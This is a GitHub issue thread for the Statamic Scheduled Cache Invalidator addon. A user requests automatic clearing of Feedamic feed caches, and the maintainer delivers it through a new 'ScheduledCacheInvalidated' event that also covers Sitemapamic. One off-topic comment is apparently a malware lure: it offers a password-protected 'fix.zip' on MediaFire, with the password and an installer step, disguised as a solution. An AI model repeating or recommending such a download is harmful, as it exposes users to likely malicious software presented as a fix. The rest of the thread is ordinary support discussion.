### ISSUE TITLE
Integration with Feedamic to clear cached feeds

### ISSUE THREAD

**Issue by steveparks** [mitydigital/statamic-scheduled-cache-invalidator#12]
Choose your own adventure:

**1. Support request:**
- I have a few custom feeds set up with Feedamic. 
- I have scheduled cache invalidator working fine, so that when a scheduled entry is published it is shown on the blog listing page
- But the feeds don't refresh. I have to go into the CP to clear caches manually (or, presumably I could SSH into the server and issue the Feedamic cache clear command shown in the documentation)
- Is there a way to trigger a feedamic cache clear from scheduled cache invalidator please?

OR, if there's not a way at present, then:

**2. Feature request:**
It would be great if Scheduled Cache Invalidator, if Feedamic is installed, also cleared the cached feeds which include entries from the collection in which it's detected a new entry.

:)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by martyf** [comment]
Oh I like this - and could work with Sitemapamic too (sitemap.xml). 

I like the second way - but wonder if it needs to be more open ended to allow custom whatever to run when it is cleared. Let me ponder this a little more to come up with something neat, useful and flexible.

**Comment by steveparks** [comment]
Great!

Perhaps there could be two layers to the enhancement:

1. A simple true/false setting in a config file to also clear feedamic feeds / sitemapamic sitemap if those addons are detected - so all your addons are easy-integration together
2. A custom way to run custom whatevers with each cache clear, based on certain rules

**Comment by martyf** [comment]
So this is kinda cool (and has been resolved).

Update your addons to get this.

A new `ScheduledCacheInvalidated` event is dispatched when an entry (or entries) are cleared from the Static Cache. 

This tells Feedamic the Collections, so any of your feeds using that Collection has its cache cleared.

It also tells Sitemapamic to clear its cache too.

Find out more:
https://docs.mity.com.au/scheduled-cache-invalidator/with-feedamic-and-sitemapamic

And for the event:
https://docs.mity.com.au/scheduled-cache-invalidator/scheduledcacheinvalidated-event

**Comment by steveparks** [comment]
That is very cool, and incredibly fast! 😃

Thanks

**Comment by martyf** [comment]
Woo glad it is working nicely 🤓
